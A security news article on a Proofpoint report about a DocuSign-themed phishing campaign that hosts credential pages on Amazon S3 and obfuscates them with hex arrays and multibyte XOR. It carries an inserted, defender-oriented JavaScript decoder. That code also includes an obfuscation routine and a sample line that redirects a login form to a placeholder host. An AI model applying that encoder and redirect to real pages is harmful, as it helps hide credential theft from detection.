Phishing Attacks Enlist Amazon AWS, Microsoft Azure in Ploys


An ongoing campaign is hosting its phishing landing pages on enterprise-class public cloud storage services — a nascent trend meant to throw defenders off.

Recent phishing campaigns have been spotted boosting their anti-detection efforts by using Amazon Web Services to host their landing pages. It’s a sign of a nascent trend towards using public cloud storage, according to researchers.

The attackers are also layering on various obfuscation techniques, including multibyte XOR encoding, according to the analysis, released by Proofpoint on Thursday.

“Threat actors, and most recently phishers, have been able to evade detection by using well-known and trusted consumer cloud, social networking and commerce services to host malicious phishing kits,” the researchers said in a posting on Thursday. “Some actors have now graduated from using consumer cloud storage such as Google Drive and Dropbox to more enterprise-class public cloud storage providers such as AWS and Microsoft Azure, and continue to use various encoding techniques in their landing web pages via JavaScript in order to evade detection.”

In late July, a targeted phishing campaign kicked off using the branding and email formatting of DocuSign. An email asks the target to sign a document electronically. If the visitor enters their information on the spoofed DocuSign landing page, they are redirected to a lookalike of the webmail provider they selected, where a second phishing page attempts to steal their credentials.

The DocuSign campaign has no particular vertical targeting, researchers said, but the phishing lure was only sent to a small group of people across various organizations.

“Visually, it appears as a fairly standard phishing lure for documents purporting to be shared via DocuSign,” researchers said. “While the landing page for the credential phish also convincingly resembles DocuSign in branding and overall format, it is actually a phishing template that has been commonly used over the past few years.”

What’s not so common is the fact that the landing page was hosted on Amazon S3. According to Proofpoint, this is a continuation of adversaries’ growing interest in public cloud buckets. Proofpoint has also recently documented threat actors abusing Microsoft’s Azure Blob Storage, it said.

The page uses JavaScript encoding, according to the analysis, with multiple layers. “A large array of hex-encoded strings which, when decoded, appears to include some ciphertext as well as a few strings, and then an eval statement to decode the encoded blob,” researchers wrote. “The encoding and variable names will often change with each deployment of the landing.”
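As an added illustration of the encoding described above, the following JavaScript is a hypothetical reconstruction of the scheme (an array of hex-encoded strings, XOR-encoded with a multibyte key, normally handed to eval) written as a defender-side decoder. It is not the actor's kit or Proofpoint's code. The sample script, the four-byte key and the chunk width are constructed for the example, and the known-plaintext key recovery assumes the decoded blob begins with a guessable JavaScript fragment such as `var `.

```javascript
// Added example: decoder for a hex-array + multibyte-XOR landing-page blob.
// Hypothetical reconstruction of the described technique; sample payload,
// key and chunk width are constructed, not taken from a real kit.

function hexToBytes(hex) {
  if (hex.length % 2 !== 0) throw new Error("odd-length hex string");
  const out = new Uint8Array(hex.length / 2);
  for (let i = 0; i < out.length; i++) {
    const byte = parseInt(hex.slice(i * 2, i * 2 + 2), 16);
    if (Number.isNaN(byte)) throw new Error(`bad hex at offset ${i * 2}`);
    out[i] = byte;
  }
  return out;
}

function bytesToHex(bytes) {
  return Array.from(bytes, (b) => b.toString(16).padStart(2, "0")).join("");
}

// Multibyte XOR: key byte (i mod key.length) is applied to byte i.
// XOR is its own inverse, so one function both encodes and decodes.
function xorMultibyte(bytes, key) {
  const out = new Uint8Array(bytes.length);
  for (let i = 0; i < bytes.length; i++) out[i] = bytes[i] ^ key[i % key.length];
  return out;
}

// Build the obfuscated form the way such a page would ship it: XOR the
// script with the key, hex-encode, and split into fixed-width chunks.
function obfuscate(script, key, chunkLen = 16) {
  const hex = bytesToHex(xorMultibyte(new TextEncoder().encode(script), key));
  const chunks = [];
  for (let i = 0; i < hex.length; i += chunkLen) chunks.push(hex.slice(i, i + chunkLen));
  return chunks;
}

// Decode without eval: join the chunks, un-hex, XOR, and return the source
// text for inspection instead of executing it.
function deobfuscate(hexChunks, key) {
  const cipher = hexToBytes(hexChunks.join(""));
  return new TextDecoder().decode(xorMultibyte(cipher, key));
}

// Recover a multibyte XOR key from a known-plaintext prefix. Because the
// blob decodes to JavaScript, a guess like "var " or "document" often works.
function recoverKey(cipherBytes, knownPrefix, keyLen) {
  const known = new TextEncoder().encode(knownPrefix);
  if (known.length < keyLen) throw new Error("known prefix shorter than key length");
  const key = new Uint8Array(keyLen);
  for (let i = 0; i < keyLen; i++) key[i] = cipherBytes[i] ^ known[i];
  return key;
}

// Constructed sample: a form-redirect snippet of the kind a credential page
// would hide, encoded under a made-up 4-byte key.
const SAMPLE_SCRIPT =
  'var f = document.getElementById("login"); f.action = "https://example.invalid/post";';
const SAMPLE_KEY = new Uint8Array([0x5a, 0x13, 0xc7, 0x2e]);
const SAMPLE_CHUNKS = obfuscate(SAMPLE_SCRIPT, SAMPLE_KEY);

// Analyst workflow: recover the key from the expected "var " prefix, then
// decode the whole blob to text.
function demo() {
  const cipher = hexToBytes(SAMPLE_CHUNKS.join(""));
  const recovered = recoverKey(cipher, "var ", SAMPLE_KEY.length);
  return {
    recoveredKey: Array.from(recovered),
    decoded: deobfuscate(SAMPLE_CHUNKS, recovered),
  };
}
```

The point of `deobfuscate` over running the page's own eval is that the decoded source comes back as text for review, and for pulling out the remote resources the kit loads, rather than being executed; `recoverKey` shows why a multibyte XOR layer costs an analyst little once a few bytes of plaintext can be guessed, even though it defeats naive string signatures.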

Once decoded, it becomes clear that the phishing kit pulls remote resources from multiple websites, all of which use TLS certificates from Let's Encrypt and all of which trace back to a user registered as "phasephaser[@]".

“The actor engaging in this activity is not new to hosting on AWS, as we have observed it in similar low-volume campaigns throughout the year,” the researchers said. “All non-AWS domains have utilized Let’s Encrypt TLS certificates, and most appear to be registered with Russian domain registration services. While all phishing was hosted on AWS during this period, in some cases the actor used other public cloud infrastructure to host specific resources for the landing pages.”

Use of enterprise cloud services is still a fledgling technique, Proofpoint researchers said, and while Amazon has been responsive and "especially vigilant" in taking down abusive accounts, they warned that defenders should be aware that cloud storage is a growing attack tool. Because the landing pages sit on hostnames owned by the cloud provider, filters that judge a link by the reputation of its hosting domain see trusted infrastructure, which is the point of the technique; detection has to look at the specific bucket or path and the page content instead.

Black Hat USA 2019 has kicked off this week in Las Vegas.
